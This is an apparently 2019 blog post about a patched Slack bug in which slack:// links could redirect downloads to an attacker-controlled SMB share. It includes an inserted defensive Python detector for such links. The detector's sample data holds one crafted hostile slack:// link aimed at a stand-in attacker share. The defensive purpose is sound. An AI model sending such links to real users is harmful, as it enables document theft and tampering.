Slack Bug Allows Remote File Hijacking, Malware Injection

Ezzeldin Tahoun, published in PwnPizza
3 min read, May 26, 2019

A vulnerability was recently found in the web client of the massively popular collaboration tool Slack that could have allowed attackers to manipulate file downloads via specially crafted hyperlinks [1]. Given that Slack now has over 10 million daily active users [2], this bug presented a serious security risk for the many Slack users who rely on the platform to exchange files with their colleagues.

Why is it important?

Many corporations rely on Slack as a reliable and safe tool for their employees to collaborate on work-related matters and, in many cases, to share work-related documents. While every corporation would prefer that the transfer of work documents be secure and safe from tampering, many companies operate in industries such as healthcare, where the exchange of documents and the required safeguards are heavily regulated by laws such as HIPAA [3]. As Slack is hoping to achieve HIPAA compliance in order to serve customers in the healthcare industry [4], as well as customers in jurisdictions with broader data-privacy laws such as the EU's GDPR [5], it is essential that file transfer on the Slack platform is held to the highest security standard.

Who is affected?

Since file transfer is such an integral part of Slack's user flow, and also a key part of what makes it such a popular platform for collaboration, all Slack users could have been affected by this vulnerability, enterprise and public users alike. For enterprise Slack users, anyone who clicks a file download link on the platform could potentially be affected. This becomes a real possibility if there is a malicious user inside the company who hopes to "manipulate or gain access to documents outside of their role or privilege level" [1]. There is a risk for public Slack users as well: an individual may join a public Slack channel (perhaps for an interest group, e.g. gaming) and expect to download a harmless file from that channel, but instead download malware onto their computer.

What impact might it have on people?

Slack fixed the bug in the very next version of its web client and confirmed that the exploit had never been used and that no users had been impacted [6]. Had it been exploited, a user attempting to download an uploaded file would have had the file's download path modified. Once the download path had been redirected, the attacker could not only steal documents but also alter them, and the altered copies could later be downloaded by unknowing users [6]. Attackers might even have been able to inject malware into uploaded Office documents [6].

What were the causes?

The overlooked bug was in the "slack://" protocol handler, which can modify sensitive settings in the Slack Desktop client [6]. Through the handler's options it was possible to set the default download location to an attacker-owned SMB share, so that every file a user downloaded would instead be written to the attacker's server, where it could be manipulated [6]. Because a protocol-handler hyperlink could be disguised as an ordinary Slack attachment, unsuspecting users were far more likely to click on it [6].
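The two ingredients above, a `slack://` link pointing a setting at a UNC/SMB path and a link dressed up to look like an attachment, are exactly what a defender can screen message text or export logs for. The following is an added example, not code from the article or from Slack; it relies on Slack's real `<target|display text>` message link syntax, but the `slack://open/?dir=` URI shape in the constructed sample is hypothetical and is used only to exercise the checks.

```python
import re
from urllib.parse import unquote

# Slack message link syntax: <target|display text> or bare <target>.
LINK_RE = re.compile(r"<([^|>]+)(?:\|([^>]*))?>")
# A UNC path (\\host\share...) or smb:// URL after URL-decoding.
UNC_RE = re.compile(r"(\\\\[\w.-]+\\[^\s\"'}]+|smb://[^\s\"'}]+)", re.IGNORECASE)
# Display text that looks like a document attachment (name.ext).
FILENAME_RE = re.compile(r"^[\w .()-]+\.(pdf|docx?|xlsx?|pptx?|zip|csv|txt)$", re.IGNORECASE)


def inspect_message(text):
    """Return one finding per suspicious slack:// link in a message.

    A finding is a dict with the decoded target, the display label and the
    list of reasons it was flagged. http(s) links are deliberately ignored:
    the concern here is the protocol handler, not ordinary web links.
    """
    findings = []
    for m in LINK_RE.finditer(text):
        target, label = m.group(1), m.group(2) or ""
        if not target.lower().startswith("slack://"):
            continue
        decoded = unquote(target)  # %5C%5C -> \\ etc.
        reasons = []
        if UNC_RE.search(decoded):
            reasons.append("unc_or_smb_path_in_slack_uri")
        if FILENAME_RE.match(label.strip()):
            reasons.append("protocol_link_disguised_as_attachment")
        if reasons:
            findings.append({"target": decoded, "label": label, "reasons": reasons})
    return findings


# Constructed sample messages (not real traffic); the slack://open/?dir=
# parameter is a hypothetical stand-in for a settings option.
SAMPLE_MESSAGES = [
    "Here is the deck: <https://files.example.com/q2-deck.pdf|q2-deck.pdf>",
    "Updated report: <slack://open/?dir=%5C%5Cfileshare-evil.example%5Cdrop|Q2_report.docx>",
    "Join us in <slack://channel?team=T000000|#general>",
]

if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        for f in inspect_message(msg):
            print(f["label"], "->", f["target"], f["reasons"])
```

Only the second sample is reported, with both reasons; a plain `slack://` channel link with no UNC path and a non-filename label passes.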

How might similar problems be prevented in the future?

While it is impossible to always ship features with zero potential for bugs, good engineering and QA processes go a long way toward ensuring that potential vulnerabilities are caught before a version is released to production. Furthermore, bug-bounty programs, such as the HackerOne program to which this bug was reported, do a great job of encouraging security experts to help Slack hold its products to a high security standard.

References

[1] Slack Bug Allows Remote File Hijacking, Malware Injection https://threatpost.com/slack-remote-file-hijacking-malware/144871/

[2] Number of daily Slack users surpasses 10 million https://searchunifiedcommunications.techtarget.com/news/252456752/Number-of-daily-Slack-users-surpasses-10-million

[3] What is HIPAA https://searchhealthit.techtarget.com/definition/HIPAA

[4] Slack is setting itself up for the $3.5 trillion healthcare sector https://www.cnbc.com/2019/02/04/slack-hipaa-compliance-indicates-health-care-move.html

[5] Slack GDPR Compliance https://slack.com/intl/en-ca/gdpr

[6] Slack Patches Download Hijack Vulnerability in Windows Desktop App https://www.tenable.com/blog/slack-patches-download-hijack-vulnerability-in-windows-desktop-app


“From error to error one discovers the entire truth.” -Sigmund Freud